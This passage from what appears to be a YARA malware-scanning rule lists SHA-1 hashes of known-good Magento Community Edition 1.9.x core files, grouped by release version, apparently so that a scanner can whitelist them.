hash.sha1(0, filesize) == "0989b6d28e5238a966d6333299750251f6621cf4" or // app/code/core/Mage/ImportExport/Model/Import/Uploader.php 427 | hash.sha1(0, filesize) == "3d8a99b05b05488ad1c89c249712dc1e45e9d1be" or // app/code/core/Mage/ImportExport/Model/Export/Entity/Customer.php 428 | hash.sha1(0, filesize) == "2510ea6f36a7824721ef930bd3b34cb19b5a623a" or // app/code/core/Mage/ImportExport/Model/Export/Entity/Product/Type/Abstract.php 429 | hash.sha1(0, filesize) == "61c48e91b39b227207d857276ad43208a517f31a" or // app/code/core/Mage/CatalogRule/sql/catalogrule_setup/mysql4-upgrade-0.7.1-0.7.2.php 430 | hash.sha1(0, filesize) == "e25d06c0cae8b8e5992b28014d7e1de33b97ab3b" or // app/code/core/Mage/Core/Model/Translate.php 431 | hash.sha1(0, filesize) == "531a0be26ca6b9444ab714983fe9727826f9a1bd" or // app/code/core/Mage/Core/Model/Layout.php 432 | hash.sha1(0, filesize) == "91a98939132e7b67dd9c5d9d1aa7278cc9356922" or // app/code/core/Mage/Dataflow/Model/Profile.php 433 | hash.sha1(0, filesize) == "3173f1e7f8889b01bccf4b64ea98e8e9ea212883" or // app/code/core/Mage/Adminhtml/Model/Url.php 434 | hash.sha1(0, filesize) == "7229c6ac1a40b4e97e1ff0274a85b33ae3a3ae56" or // app/design/frontend/default/iphone/template/catalog/product/view/media.phtml 435 | hash.sha1(0, filesize) == "6e6978736bd02faf3350f54fd0711abda85995af" or // app/design/frontend/base/default/template/customer/widget/dob.phtml 436 | hash.sha1(0, filesize) == "2ade0c0fe3ba96238bcc8d9e486316ebebbc543d" or // app/design/adminhtml/default/default/template/notification/toolbar.phtml 437 | hash.sha1(0, filesize) == "06412e5959c3d322cf0702cd2533d6e89cc64b1e" or // lib/Magento/Autoload/Simple.php 438 | hash.sha1(0, filesize) == "1c7302f33d227f8bbb8e7dba6f45cacfa353a1e0" or // lib/Mage/Autoload/Simple.php 439 | hash.sha1(0, filesize) == "f60b8ccc6af994fcb5390858d913c6894daf8d6a" or // lib/Varien/Pear.php 440 | hash.sha1(0, filesize) == "e67dbb73a945ced9ca3b139b4bb9634d49890494" or // lib/Varien/Autoload.php 441 | 
hash.sha1(0, filesize) == "a3b95117cb53b32f15933a323d0caecb28ba8f59" or // lib/Varien/Data/Form/Element/Gallery.php 442 | hash.sha1(0, filesize) == "eddcb2ed2b259b3bc0819316a3f82e8e765010e3" or // lib/Varien/Data/Form/Element/Multiline.php 443 | hash.sha1(0, filesize) == "c0db9c81f156724e5b34ce33bf584d7af6d9ec0b" or // lib/Varien/File/Uploader.php 444 | hash.sha1(0, filesize) == "4bf65c05b7f31d0b068a9586b3384f37818e83ba" or // lib/Varien/Db/Tree.php 445 | 446 | /* Magento CE 1.9.2.4 */ 447 | hash.sha1(0, filesize) == "1b93c2a04a83e7577623ee4af05c428819cb7c16" or // lib/Varien/File/Uploader.php 448 | 449 | /* Magento CE 1.9.3.0 */ 450 | hash.sha1(0, filesize) == "3f1c255821b6a821dabca2dc02bd0d88ce19a2b2" or // cron.php 451 | hash.sha1(0, filesize) == "6e9a284038a3e121052e5ff3b69d580dc3dbd387" or // app/code/core/Mage/Dataflow/Model/Profile.php 452 | hash.sha1(0, filesize) == "b2e8d4ed802a50d96711e73db12ef9e6225fd6ce" or // lib/Varien/Autoload.php 453 | 454 | /* Magento CE 1.9.3.1 */ 455 | 456 | /* Magento CE 1.9.3.2 */ 457 | hash.sha1(0, filesize) == "a5f4b3b79113406a25803258e67955ecaef58f96" or // cron.php 458 | hash.sha1(0, filesize) == "b59a9f79f93104dd0f2086ecb41b121ca83c49c5" or // app/code/core/Mage/CatalogRule/sql/catalogrule_setup/mysql4-upgrade-0.7.1-0.7.2.php 459 | hash.sha1(0, filesize) == "10396708b76cffb8e5ec478e138668fe7f7fb08e" or // app/code/core/Mage/Core/Model/Translate.php 460 | hash.sha1(0, filesize) == "c3cc023db136ab16195a00821c28def911e5aa22" or // app/code/core/Mage/Dataflow/Model/Profile.php 461 | hash.sha1(0, filesize) == "0c5c35de2e11051a72842dec7fa77279076c7107" or // app/code/core/Mage/Adminhtml/Model/Url.php 462 | hash.sha1(0, filesize) == "6da6474df8515b58505301368d64b054a973be87" or // app/design/frontend/default/iphone/template/catalog/product/view/media.phtml 463 | hash.sha1(0, filesize) == "db22a8c5bac3dfecfd67be8cbb856256ce005e03" or // app/design/frontend/base/default/template/customer/widget/dob.phtml 464 | hash.sha1(0, 
filesize) == "c78c97ee710b3ece67398146c337593d208b763a" or // app/design/adminhtml/default/default/template/notification/toolbar.phtml 465 | hash.sha1(0, filesize) == "c395f8c60434160d0a4fdca0a9981eb4c6a13021" or // lib/Magento/Autoload/Simple.php 466 | hash.sha1(0, filesize) == "9163281f49361481293a54155b48a18f502679ea" or // lib/Mage/Autoload/Simple.php 467 | hash.sha1(0, filesize) == "6c577b685ed6a73c08abaabef945070c722e14f9" or // lib/Varien/Pear.php 468 | hash.sha1(0, filesize) == "5d7e38bd1345fa0afc6e0c1f2eec085d556da06a" or // lib/Varien/Autoload.php 469 | hash.sha1(0, filesize) == "cd52d865f0d58fe0fa993b3aaa134ed86b4ddd87" or // lib/Varien/Data/Form/Element/Gallery.php 470 | hash.sha1(0, filesize) == "a80a3a304b0abd1732e704ccc3b8f4816605052b" or // lib/Varien/Data/Form/Element/Multiline.php 471 | hash.sha1(0, filesize) == "c1cbd9d692c66deed9c4419c6c78491292aec5a0" or // lib/Varien/Db/Tree.php 472 | 473 | /* Magento CE 1.9.3.3 */ 474 | 475 | /* Magento CE 1.9.3.4 */ 476 | 477 | /* Magento CE 1.9.3.6 */ 478 | hash.sha1(0, filesize) == "45ffcf03c297d29169d2fd00790ff8eb83ef5fec" or // app/code/core/Zend/Serializer/Adapter/PhpCode.php 479 | hash.sha1(0, filesize) == "294d413697f3461aa1b20dab404040eb483cec95" or // app/design/adminhtml/default/default/template/notification/toolbar.phtml 480 | 481 | /* Magento CE 1.9.3.7 */ 482 | 483 | /* Magento CE 1.9.3.8 */ 484 | hash.sha1(0, filesize) == "fb7414b830abc653d624019a18689d4dd69d7f90" or // cron.php 485 | hash.sha1(0, filesize) == "06f0a6333273222b5e39b7e9e8c5e3ef764d639b" or // app/code/core/Mage/CatalogRule/sql/catalogrule_setup/mysql4-upgrade-0.7.1-0.7.2.php 486 | hash.sha1(0, filesize) == "8bb1ce05c51baff0b8fe24c4320e22fcd18bbc47" or // app/code/core/Mage/Core/Model/Translate.php 487 | hash.sha1(0, filesize) == "b4aab58ed7efbe7aa809c1aae2fe90494a3d403e" or // app/code/core/Mage/Dataflow/Model/Profile.php 488 | hash.sha1(0, filesize) == "28f900ea871d38dfdb5347f1c9861a7621825a2d" or // 
app/code/core/Mage/Adminhtml/Model/Url.php 489 | hash.sha1(0, filesize) == "7d84d41fee5ec9e6825654a1ef4ea785bb1eda29" or // app/design/frontend/default/iphone/template/catalog/product/view/media.phtml 490 | hash.sha1(0, filesize) == "7ae589b2fa62b74e0075da5c5c3cba8282df7c4c" or // app/design/frontend/base/default/template/customer/widget/dob.phtml 491 | hash.sha1(0, filesize) == "fd489abda5b880c3c24fd48f7f8388917a119c19" or // app/design/adminhtml/default/default/template/notification/toolbar.phtml 492 | hash.sha1(0, filesize) == "ca8a29edddc5deccc47e95da68a20d557abd7621" or // lib/Magento/Autoload/Simple.php 493 | hash.sha1(0, filesize) == "7035f2cfad6f0936bd5c533fa26379440484c82c" or // lib/Mage/Autoload/Simple.php 494 | hash.sha1(0, filesize) == "79ee56a5b2a661467cf0b90060e98085a94bcd91" or // lib/Varien/Pear.php 495 | hash.sha1(0, filesize) == "b6abca064319d3f94430b0545e5d2e1eec4e1ea7" or // lib/Varien/Autoload.php 496 | hash.sha1(0, filesize) == "476d8b4554f8bf9cfe6d77c056eaf201eee1348a" or // lib/Varien/Data/Form/Element/Gallery.php 497 | hash.sha1(0, filesize) == "78694d3161b6dee34635eaf3dda65259d0045443" or // lib/Varien/Data/Form/Element/Multiline.php 498 | hash.sha1(0, filesize) == "14551c7936764a457729f2ceba437f6c4e829fbd" or // lib/Varien/Db/Tree.php 499 | 500 | /* Magento CE 1.9.3.9 */ 501 | hash.sha1(0, filesize) == "b6b6747a3d7f3f54e150fbfc0ae9f22068276f57" or // cron.php 502 | 503 | false 504 | } 505 | --------------------------------------------------------------------------------